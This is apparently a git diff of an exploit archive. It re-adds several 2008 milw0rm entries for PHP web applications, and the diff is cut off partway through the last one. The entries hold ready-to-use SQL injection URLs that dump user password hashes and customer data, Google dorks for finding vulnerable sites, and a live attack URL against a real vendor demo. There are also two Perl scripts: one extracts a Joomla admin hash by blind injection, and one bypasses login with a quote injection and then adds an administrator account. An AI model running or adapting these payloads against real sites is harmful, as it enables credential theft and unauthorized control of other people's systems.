+[*] Funny note:  You can change "taurus" to your sign for best results xd...
+
+                
+----------------------------------------------------------------------------
+[*] Greetings :  All friends & muslims HaCkeRs...
+[*] Greetings2:  http://www.dz-secure.com
+                 http://palcastle.org/cc
+
+# milw0rm.com [2008-06-28]
diff --git a/platforms/php/webapps/5964.txt b/platforms/php/webapps/5964.txt
index cfe832ba6..05e424523 100755
--- a/platforms/php/webapps/5964.txt
+++ b/platforms/php/webapps/5964.txt
@@ -1,57 +1,57 @@
-#########################################################
-#
-#    Online Booking Manager2.2 (id=) SQL Injection Vulnerability
-#
-#########################################################
-#
-#    Author: Hussin X
-#
-#    Home :  www.tryag.cc/cc
-# 
-#    email:  darkangel_g85[at]Yahoo[DoT]com
-#            hussin.x[at]hotmail[DoT]com
-#
-#                     IRAQI
-#
-##########################################################
-#    HomE script : http://www.onlinebookingmanager.com
-#                
-#           demo : http://demo.onlinebookingmanager.com/guestside/
-#     
-##########################################################
-#
-#    DorK : Online Booking Manager2.2
-#
-##########################################################
-
-Exploit:   
-
-
-http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--
-
-
-
-
-L!VE DEMO:
-
-
-http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--
-
-
-
-
-Login AdmiN :
-
-
-
-/adminside/systemadmin/
-
-
-####################################( Greetz )##################################
-#                                                                              #
-#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
-#                          Silic0n/ FAHD / Iraqihack                           #      
-#                                                                              #
-#################################(and All IRAQIs)###############################
-
-# milw0rm.com [2008-06-28]
+#########################################################
+#
+#    Online Booking Manager2.2 (id=) SQL Injection Vulnerability
+#
+#########################################################
+#
+#    Author: Hussin X
+#
+#    Home :  www.tryag.cc/cc
+# 
+#    email:  darkangel_g85[at]Yahoo[DoT]com
+#            hussin.x[at]hotmail[DoT]com
+#
+#                     IRAQI
+#
+##########################################################
+#    HomE script : http://www.onlinebookingmanager.com
+#                
+#           demo : http://demo.onlinebookingmanager.com/guestside/
+#     
+##########################################################
+#
+#    DorK : Online Booking Manager2.2
+#
+##########################################################
+
+Exploit:   
+
+
+http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--
+
+
+
+
+L!VE DEMO:
+
+
+http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--
+
+
+
+
+Login AdmiN :
+
+
+
+/adminside/systemadmin/
+
+
+####################################( Greetz )##################################
+#                                                                              #
+#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
+#                          Silic0n/ FAHD / Iraqihack                           #      
+#                                                                              #
+#################################(and All IRAQIs)###############################
+
+# milw0rm.com [2008-06-28]
diff --git a/platforms/php/webapps/5965.txt b/platforms/php/webapps/5965.txt
index 1a20f69f5..5b17c07e9 100755
--- a/platforms/php/webapps/5965.txt
+++ b/platforms/php/webapps/5965.txt
@@ -1,21 +1,21 @@
-/---------------------------------------------------------------\
-\                                				/
-/     Joomla Component beamospetition Remote SQL injection      \
-\                                				/
-\---------------------------------------------------------------/
-
-
-[*] Author    :  His0k4 [ALGERIAN HaCkEr]
-
-[*] Dork      :  inurl:com_beamospetition
-
-[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}
-
-[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
-     
-----------------------------------------------------------------------------
-[*] Greetings :  All friends & muslims HaCkeRs...
-[*] Greetings2:  http://www.dz-secure.com
-                 http://palcastle.org/cc
-
-# milw0rm.com [2008-06-28]
+/---------------------------------------------------------------\
+\                                				/
+/     Joomla Component beamospetition Remote SQL injection      \
+\                                				/
+\---------------------------------------------------------------/
+
+
+[*] Author    :  His0k4 [ALGERIAN HaCkEr]
+
+[*] Dork      :  inurl:com_beamospetition
+
+[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}
+
+[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
+     
+----------------------------------------------------------------------------
+[*] Greetings :  All friends & muslims HaCkeRs...
+[*] Greetings2:  http://www.dz-secure.com
+                 http://palcastle.org/cc
+
+# milw0rm.com [2008-06-28]
diff --git a/platforms/php/webapps/5966.pl b/platforms/php/webapps/5966.pl
index 51b337993..eff728b89 100755
--- a/platforms/php/webapps/5966.pl
+++ b/platforms/php/webapps/5966.pl
@@ -1,115 +1,115 @@
-#!/usr/bin/perl
-use LWP::UserAgent;
-use Getopt::Long;
-
-if(!$ARGV[1])
-{
-  print "                                                                  \n";
-    print "   ################################################################\n";
-  print "   #   Joomla Component Xe webtv Blind SQL Injection Exploit      #\n";
-  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                            #\n";
-  print "   #                                                              #\n";
-  print "   #   Conctact: His0k4.hlm[at]gamil.com                          #\n";
-  print "   #   Greetz:   All friends & muslims HacKeRs                    #\n";
-  print "   #   Greetz2:  http://www.dz-secure.com                         #\n";
-  print "   #             http://www.palcastle.org/cc                      #\n";
-  print "   #                                                              #\n";
-  print "   #   Dork:    inurl:com_xewebtv                                 #\n";
-  print "   #   Usage:   perl xewebtv.pl host path                #\n";
-  print "   #   Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2  #\n";
-  print "   #                                                              #\n";
-  print "   #   Options:                                                   #\n";
-  print "   #     -t    Valid  tv id                                       #\n";
-  print "   #     -c    Category value of the following id                 #\n";
-  print "   #   Note:                                                      #\n";
-  print "   #   You can change the match string if you need that           #\n";
-  print "   ################################################################\n";
-
-  exit;
-}
-
-my $host    = $ARGV[0];
-my $path    = $ARGV[1];
-my $cid     = $ARGV[2];
-my $tid     = $ARGV[3];
-
-my %options = ();
-GetOptions(\%options, "c=i", "p=s", "t=i");
-
-print "[~] Exploiting...\n";
-
-if($options{"c"})
-{
-  $cid = $options{"c"};
-}
-
-if($options{"t"})
-{
-  $tid = $options{"t"};
-}
-
-syswrite(STDOUT, "[~] MD5-Hash: ", 14);
-
-for(my $i = 1; $i <= 32; $i++)
-{
-  my $f = 0;
-  my $h = 48;
-  while(!$f && $h <= 57)
-  {
-    if(istrue2($host, $path, $cid, $tid, $i, $h))
-    {
-      $f = 1;
-      syswrite(STDOUT, chr($h), 1);
-    }
-    $h++;
-  }
-  if(!$f)
-  {
-    $h = 97;
-    while(!$f && $h <= 122)
-    {
-      if(istrue2($host, $path, $cid, $tid, $i, $h))
-      {
-        $f = 1;
-        syswrite(STDOUT, chr($h), 1);
-      }
-      $h++;
-    }
-  }
-}
-
-print "\n[~] Exploiting done\n";
-
-sub istrue2
-{
-  my $host  = shift;
-  my $path  = shift;
-  my $cid   = shift;
-  my $tid   = shift;
-  my $i     = shift;
-  my $h     = shift;
- 
-  my $ua = LWP::UserAgent->new;
-  my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
- 
-  if($options{"p"})
-  {
-    $ua->proxy('http', "http://".$options{"p"});
-  }
- 
-  my $resp = $ua->get($query);
-  my $content = $resp->content;
-  my $regexp = "viewcategory&catid=".$cid."";
- 
-  if($content =~ /$regexp/)
-  {
-    return 1;
-  }
-  else
-  {
-    return 0;
-  }
-
-}
-
-# milw0rm.com [2008-06-28]
+#!/usr/bin/perl
+use LWP::UserAgent;
+use Getopt::Long;
+
+if(!$ARGV[1])
+{
+  print "                                                                  \n";
+    print "   ################################################################\n";
+  print "   #   Joomla Component Xe webtv Blind SQL Injection Exploit      #\n";
+  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                            #\n";
+  print "   #                                                              #\n";
+  print "   #   Conctact: His0k4.hlm[at]gamil.com                          #\n";
+  print "   #   Greetz:   All friends & muslims HacKeRs                    #\n";
+  print "   #   Greetz2:  http://www.dz-secure.com                         #\n";
+  print "   #             http://www.palcastle.org/cc                      #\n";
+  print "   #                                                              #\n";
+  print "   #   Dork:    inurl:com_xewebtv                                 #\n";
+  print "   #   Usage:   perl xewebtv.pl host path                #\n";
+  print "   #   Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2  #\n";
+  print "   #                                                              #\n";
+  print "   #   Options:                                                   #\n";
+  print "   #     -t    Valid  tv id                                       #\n";
+  print "   #     -c    Category value of the following id                 #\n";
+  print "   #   Note:                                                      #\n";
+  print "   #   You can change the match string if you need that           #\n";
+  print "   ################################################################\n";
+
+  exit;
+}
+
+my $host    = $ARGV[0];
+my $path    = $ARGV[1];
+my $cid     = $ARGV[2];
+my $tid     = $ARGV[3];
+
+my %options = ();
+GetOptions(\%options, "c=i", "p=s", "t=i");
+
+print "[~] Exploiting...\n";
+
+if($options{"c"})
+{
+  $cid = $options{"c"};
+}
+
+if($options{"t"})
+{
+  $tid = $options{"t"};
+}
+
+syswrite(STDOUT, "[~] MD5-Hash: ", 14);
+
+for(my $i = 1; $i <= 32; $i++)
+{
+  my $f = 0;
+  my $h = 48;
+  while(!$f && $h <= 57)
+  {
+    if(istrue2($host, $path, $cid, $tid, $i, $h))
+    {
+      $f = 1;
+      syswrite(STDOUT, chr($h), 1);
+    }
+    $h++;
+  }
+  if(!$f)
+  {
+    $h = 97;
+    while(!$f && $h <= 122)
+    {
+      if(istrue2($host, $path, $cid, $tid, $i, $h))
+      {
+        $f = 1;
+        syswrite(STDOUT, chr($h), 1);
+      }
+      $h++;
+    }
+  }
+}
+
+print "\n[~] Exploiting done\n";
+
+sub istrue2
+{
+  my $host  = shift;
+  my $path  = shift;
+  my $cid   = shift;
+  my $tid   = shift;
+  my $i     = shift;
+  my $h     = shift;
+ 
+  my $ua = LWP::UserAgent->new;
+  my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
+ 
+  if($options{"p"})
+  {
+    $ua->proxy('http', "http://".$options{"p"});
+  }
+ 
+  my $resp = $ua->get($query);
+  my $content = $resp->content;
+  my $regexp = "viewcategory&catid=".$cid."";
+ 
+  if($content =~ /$regexp/)
+  {
+    return 1;
+  }
+  else
+  {
+    return 0;
+  }
+
+}
+
+# milw0rm.com [2008-06-28]
diff --git a/platforms/php/webapps/5967.txt b/platforms/php/webapps/5967.txt
index 82cfda85c..7d0123c5b 100755
--- a/platforms/php/webapps/5967.txt
+++ b/platforms/php/webapps/5967.txt
@@ -1,68 +1,68 @@
-# Name: SebracCMS
-# Webiste: http://www.sebrac.netsons.org/cms/
-# Vulnerability type: SQL Injection
-# Author:
-#         shinmai, 2008-06-28
-######################################################################################
-# Description:
-#
-# SebracCMS contains two major SQL injection vulnerabilities:
-# Unsanitazed POST-variables in SQL queries when logging users in. This allows
-# login access without proper credentials.
-# And unsanitized GET-variables in SQL queries when loading articles.
-This allows
-# an attacker to read all usernames and passwordhashes in the database.
-#
-# Vulnerable code in cms/index.php:
-
-$n=$_POST['uname'];
-$p= strtolower($_POST['upass']);
-$cryp_p = md5($p);
-//connect to db
-include('incls/config.php');
-$query="select * from sbc_user where uname='$n' and pw='$cryp_p'";
-
-#
-# POC
-#
-# using
-admin' OR '1'='1
-# as the username will allow login without proper registered credentials
-#
-#
-# The second and far more serious SQL Injection is in cms/form/read.php
-#
-# This vulnerability allows an attacker to reveal all users and their
-md5-password hashes.
-#
-#
-# Vulnerable code in cms/form/read.php:
-
-$rec=($_GET['recid']);
-*SNIP*
-$query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error());
-
-#
-# POC
-#
-# using
-1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
-# as the GET-variable 'recid' reveals the first post along with all
-registered users and their passwordhashes.
-# Example:
-http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT
-uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
-
-#
-# There are some other SQLI-vulnerabilities there, but these two are
-the most severe. I was going to include
-# one more for changing any users password, but I simply didn't have
-the time to start crafting very complex
-# injections. Also, I have a sneaking suspicion there's a
-LFI-vulnerability in the photo-gallery code in the CMS,
-# but if there is one, I'll write up an other advisory on that.
-#
-# As always, Good luck and be safe.
-#
-
-# milw0rm.com [2008-06-28]
+# Name: SebracCMS
+# Webiste: http://www.sebrac.netsons.org/cms/
+# Vulnerability type: SQL Injection
+# Author:
+#         shinmai, 2008-06-28
+######################################################################################
+# Description:
+#
+# SebracCMS contains two major SQL injection vulnerabilities:
+# Unsanitazed POST-variables in SQL queries when logging users in. This allows
+# login access without proper credentials.
+# And unsanitized GET-variables in SQL queries when loading articles.
+This allows
+# an attacker to read all usernames and passwordhashes in the database.
+#
+# Vulnerable code in cms/index.php:
+
+$n=$_POST['uname'];
+$p= strtolower($_POST['upass']);
+$cryp_p = md5($p);
+//connect to db
+include('incls/config.php');
+$query="select * from sbc_user where uname='$n' and pw='$cryp_p'";
+
+#
+# POC
+#
+# using
+admin' OR '1'='1
+# as the username will allow login without proper registered credentials
+#
+#
+# The second and far more serious SQL Injection is in cms/form/read.php
+#
+# This vulnerability allows an attacker to reveal all users and their
+md5-password hashes.
+#
+#
+# Vulnerable code in cms/form/read.php:
+
+$rec=($_GET['recid']);
+*SNIP*
+$query="Select * from sbc_articles where idart= '$rec'" or die(mysql_error());
+
+#
+# POC
+#
+# using
+1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
+# as the GET-variable 'recid' reveals the first post along with all
+registered users and their passwordhashes.
+# Example:
+http://localhost/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT
+uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
+
+#
+# There are some other SQLI-vulnerabilities there, but these two are
+the most severe. I was going to include
+# one more for changing any users password, but I simply didn't have
+the time to start crafting very complex
+# injections. Also, I have a sneaking suspicion there's a
+LFI-vulnerability in the photo-gallery code in the CMS,
+# but if there is one, I'll write up an other advisory on that.
+#
+# As always, Good luck and be safe.
+#
+
+# milw0rm.com [2008-06-28]
diff --git a/platforms/php/webapps/5969.txt b/platforms/php/webapps/5969.txt
index b434c1022..c0832049a 100755
--- a/platforms/php/webapps/5969.txt
+++ b/platforms/php/webapps/5969.txt
@@ -1,32 +1,32 @@
-######################
-#
-#AcmlmBoard v1.A2 SQL Injection Vulnerability
-#
-######################
-#
-#Bug by: h0yt3r
-#
-#Dork: "AcmlmBoard v1.A2"
-#
-##
-###
-##
-#
-#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
-#An Attacker can easily get sensitive information from the database by
-#injecting unexpected SQL Querys.
-#
-#SQL Injection:
-#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
-#
-#PoC:
-#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
-#
-#######################
-#
-#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
-#
-#######################
-#######################
-
-# milw0rm.com [2008-06-30]
+######################
+#
+#AcmlmBoard v1.A2 SQL Injection Vulnerability
+#
+######################
+#
+#Bug by: h0yt3r
+#
+#Dork: "AcmlmBoard v1.A2"
+#
+##
+###
+##
+#
+#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
+#An Attacker can easily get sensitive information from the database by
+#injecting unexpected SQL Querys.
+#
+#SQL Injection:
+#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
+#
+#PoC:
+#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
+#
+#######################
+#
+#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
+#
+#######################
+#######################
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5970.txt b/platforms/php/webapps/5970.txt
index 6547f92ae..42750de2a 100755
--- a/platforms/php/webapps/5970.txt
+++ b/platforms/php/webapps/5970.txt
@@ -1,72 +1,72 @@
--                                 ,     .ss$$$$$$$$$$s,
--                                 $. s$$$$$$$$$$$$$$`$$Ss
--                                 "$$$$$$$$$$$$$$$$$$o$$$       ,
--                                s$$$$$$$$$$$$$$$$$$$$$$$$s,  ,s
--                               s$$$$$$$$$"$$$$$$""""$$$$$$"$$$$$,
--                               s$$$$$$$$$$s""$$$$ssssss"$$$$$$$$"
--                              s$$$$$$$$$$'         `"""ss"$"$s""
--                              s$$$$$$$$$$,              `"""""$  .s$$s
--                              s$$$$$$$$$$$$s,...               `s$$'  `
--                          `ssss$$$$$$$$$$$$$$$$$$$$####s.     .$$"$.   , s-
--                            `""""$$$$$$$$$$$$$$$$$$$$#####$$$$$$"     $.$'
--                                  "$$$$$$$$$$$$$$$$$$$$$####s""     .$$$|
--                                   "$$$$$$$$$$$$$$$$$$$$$$$$##s    .$$" $
--                                    $$""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"   `
--                                   $$"  "$"$$$$$$$$$$$$$$$$$$$$S""""'
--                              ,   ,"     '  $$$$$$$$$$$$$$$$####s
--                              $.          .s$$$$$$$$$$$$$$$$$####"
--                           "$s.   ..ssS$$$$$$$$$$$$$$$$$$$####"
--                             .$$$S$$$$$$$$$$$$$$$$$$$$$$$$#####"
--                       ..sS$$$$$$$$$$$$$$$$$$$$$$$$$$$######""
--                   "$$sS$$$$$$$$$$$$$$$$$$$$$$$$$$$########"
--            ,      s$$$$$$$$$$$$$$$$$$$$$$$$#########""'
--            $    s$$$$$$$$$$$$$$$$$$$$$#######""'      s'         ,
--            $$..$$$$$$$$$$$$$$$$$$######"'       ....,$$....    ,$
--             "$$$$$$$$$$$$$$$######"' ,     .sS$$$$$$$$$$$$$$$$s$$
--               $$$$$$$$$$$$#####"     $, .s$$$$$$$$$$$$$$$$$$$$$$$$s.
--    )          $$$$$$$$$$$#####'      `$$$$$$$$$###########$$$$$$$$$$$.
--   ((          $$$$$$$$$$$#####       $$$$$$$$###"       "####$$$$$$$$$$
-
-             ########################################################################
-             #                                                                      #
-             #    ...:::::eSHOP100 SQL Injection Vulnerbility ::::....        #         
-             ########################################################################
-
-
-     ## AUTHOR : JuDge
-                           
-   ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
-                          
-  ## Script WebSite:http://www.eshop100.co.uk
-
- ##Dork::)
-
-##DescRipTiON: pull customers info from database
-   
-##EXPLOITS:
-                 www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
-            
-
-            ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
-
-=======================================================================================================================================
-## thx to : All My FrienDs
-                                   
-                              i'm Not a HaCker
--   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
--  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$' )
--   ((          $$$$$$$$$$$#####       $$$$$$$$###"       "####$$$$$$$$$$
--   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
--  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$'
--  )  ( (       $$"$$$$$$$$$$$#####.$$$$$###'  JuDge Da  .###$$$$$$$$$$"
--  (  )  )   _,$"   $$$$$$$$$$$$######.$$##'     BeST     .###$$$$$$$$$$
--  ) (  ( \.         "$$$$$$$$$$$$$#######,,,.          ..####$$$$$$$$$$$"
-- (   )$ )  )        ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$"
-- (   ($$  ( \     _sS"  `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$,
--  )  )$$$s ) )  .      .   `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"'  `$$
--   (   $$$Ss/  .$,    .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S""        '
--     \)_$$$$$$$$$$$$$$$$$$$$$$$##"  $$        `$$.        `$$.
--         `"S$$$$$$$$$$$$$$$$$#"      $          `$          `$
--             `"""""""""""""'         '           '           '
-
-# milw0rm.com [2008-06-30]
+-                                 ,     .ss$$$$$$$$$$s,
+-                                 $. s$$$$$$$$$$$$$$`$$Ss
+-                                 "$$$$$$$$$$$$$$$$$$o$$$       ,
+-                                s$$$$$$$$$$$$$$$$$$$$$$$$s,  ,s
+-                               s$$$$$$$$$"$$$$$$""""$$$$$$"$$$$$,
+-                               s$$$$$$$$$$s""$$$$ssssss"$$$$$$$$"
+-                              s$$$$$$$$$$'         `"""ss"$"$s""
+-                              s$$$$$$$$$$,              `"""""$  .s$$s
+-                              s$$$$$$$$$$$$s,...               `s$$'  `
+-                          `ssss$$$$$$$$$$$$$$$$$$$$####s.     .$$"$.   , s-
+-                            `""""$$$$$$$$$$$$$$$$$$$$#####$$$$$$"     $.$'
+-                                  "$$$$$$$$$$$$$$$$$$$$$####s""     .$$$|
+-                                   "$$$$$$$$$$$$$$$$$$$$$$$$##s    .$$" $
+-                                    $$""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"   `
+-                                   $$"  "$"$$$$$$$$$$$$$$$$$$$$S""""'
+-                              ,   ,"     '  $$$$$$$$$$$$$$$$####s
+-                              $.          .s$$$$$$$$$$$$$$$$$####"
+-                           "$s.   ..ssS$$$$$$$$$$$$$$$$$$$####"
+-                             .$$$S$$$$$$$$$$$$$$$$$$$$$$$$#####"
+-                       ..sS$$$$$$$$$$$$$$$$$$$$$$$$$$$######""
+-                   "$$sS$$$$$$$$$$$$$$$$$$$$$$$$$$$########"
+-            ,      s$$$$$$$$$$$$$$$$$$$$$$$$#########""'
+-            $    s$$$$$$$$$$$$$$$$$$$$$#######""'      s'         ,
+-            $$..$$$$$$$$$$$$$$$$$$######"'       ....,$$....    ,$
+-             "$$$$$$$$$$$$$$$######"' ,     .sS$$$$$$$$$$$$$$$$s$$
+-               $$$$$$$$$$$$#####"     $, .s$$$$$$$$$$$$$$$$$$$$$$$$s.
+-    )          $$$$$$$$$$$#####'      `$$$$$$$$$###########$$$$$$$$$$$.
+-   ((          $$$$$$$$$$$#####       $$$$$$$$###"       "####$$$$$$$$$$
+
+             ########################################################################
+             #                                                                      #
+             #    ...:::::eSHOP100 SQL Injection Vulnerbility ::::....        #         
+             ########################################################################
+
+
+     ## AUTHOR : JuDge
+                           
+   ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
+                          
+  ## Script WebSite:http://www.eshop100.co.uk
+
+ ##Dork::)
+
+##DescRipTiON: pull customers info from database
+   
+##EXPLOITS:
+                 www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
+            
+
+            ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
+
+=======================================================================================================================================
+## thx to : All My FrienDs
+                                   
+                              i'm Not a HaCker
+-   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
+-  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$' )
+-   ((          $$$$$$$$$$$#####       $$$$$$$$###"       "####$$$$$$$$$$
+-   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
+-  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$'
+-  )  ( (       $$"$$$$$$$$$$$#####.$$$$$###'  JuDge Da  .###$$$$$$$$$$"
+-  (  )  )   _,$"   $$$$$$$$$$$$######.$$##'     BeST     .###$$$$$$$$$$
+-  ) (  ( \.         "$$$$$$$$$$$$$#######,,,.          ..####$$$$$$$$$$$"
+- (   )$ )  )        ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$"
+- (   ($$  ( \     _sS"  `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$,
+-  )  )$$$s ) )  .      .   `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"'  `$$
+-   (   $$$Ss/  .$,    .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S""        '
+-     \)_$$$$$$$$$$$$$$$$$$$$$$$##"  $$        `$$.        `$$.
+-         `"S$$$$$$$$$$$$$$$$$#"      $          `$          `$
+-             `"""""""""""""'         '           '           '
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5971.pl b/platforms/php/webapps/5971.pl
index 967dce397..1f99acac6 100755
--- a/platforms/php/webapps/5971.pl
+++ b/platforms/php/webapps/5971.pl
@@ -1,122 +1,122 @@
-#!/usr/bin/perl
-#============================================
-# BareNuked CMS Arbitrary Add Admin Exploit
-#============================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 30 June 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : BareNuked CMS
-#VERSION     : 1.1.0
-#DOWNLOAD    : http://downloads.sourceforge.net/barenuked/barenuked-1.1.0.zip
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#
-#This Exploit will Add user to Administrator's Privilege.
-#
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-#
-# milw0rm.com [2008-06-30]
-
-
-use LWP;
-use HTTP::Request;
-use HTTP::Cookies;
-
-if ($#ARGV + 1 != 4)
-{
-   print "\n==============================================\n";
-   print "  BareNuked CMS Arbitrary Add Admin Exploit   \n";
-   print "                                              \n";
-   print "        Discovered By CWH Underground         \n";
-   print "==============================================\n";
-   print "                                              \n";
-   print "  ,--^----------,--------,-----,-------^--,   \n";
-   print "  | |||||||||   `--------'     |          O	\n";
-   print "  `+---------------------------^----------|   \n";
-   print "    `\_,-------, _________________________|   \n";
-   print "      / XXXXXX /`|     /                      \n";
-   print "     / XXXXXX /  `\   /                       \n";
-   print "    / XXXXXX /\______(                        \n";
-   print "   / XXXXXX /                                 \n";
-   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
-   print " (________(                                   \n";
-   print "  `------'                                    \n";
-   print "                                              \n"; 
-   print "Usage: ./xpl-barenuked.pl    \n";
-   print "Ex. ./xpl-barenuked.pl http://www.target.com/barenuked/ cwh password cwh\@cwh.com\n";
-   exit();
-}
-
-$cmsurl = $ARGV[0];
-$user = $ARGV[1];
-$pass = $ARGV[2];
-$mail = $ARGV[3];
-
-
-$loginurl = $cmsurl."admin/index.php";
-$adduserurl = $cmsurl."admin/users.php";
-$post_content = "name=".$user."&pass=".$pass."&email=".$mail."&rights=admin&mode=create&Submit=New";
-
-print "\n..::Login Page URL::..\n";
-print "[+] $loginurl\n";
-print "\n..::Add User Page URL::..\n";
-print "[+] $adduserurl\n\n";
-
-$ua = LWP::UserAgent->new;
-$ua->cookie_jar(HTTP::Cookies->new);
-
-$request = HTTP::Request->new (POST => $loginurl);
-$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
-$request->content_type ('application/x-www-form-urlencoded');
-$request->content ('username=admin&password=\' or \'a\'=\'a&submit=Log+In');
-
-$response = $ua->request($request);
-
-$content = $response->content;
-
-if ($content =~ /My Webpage Administration/)
-{
-   print "\n!!! Login Success !!!\n\n";
-}
-else
-{
-   print "\n!!! Login Failed !!!\n\n";
-   exit();
-}
-
-$request = HTTP::Request->new (POST => $adduserurl);
-$request->content_type ('application/x-www-form-urlencoded');
-$request->content ($post_content);
-$response = $ua->request($request);
-
-$content = $response->content;
-
-if ($content =~ /$user/)
-{
-   print "\n!!! Exploit Completed !!!\n";
-}
-else
-{
-   print "\n!!! Exploit Failed !!!\n";
-}
-
-# milw0rm.com [2008-06-30]
+#!/usr/bin/perl
+#============================================
+# BareNuked CMS Arbitrary Add Admin Exploit
+#============================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
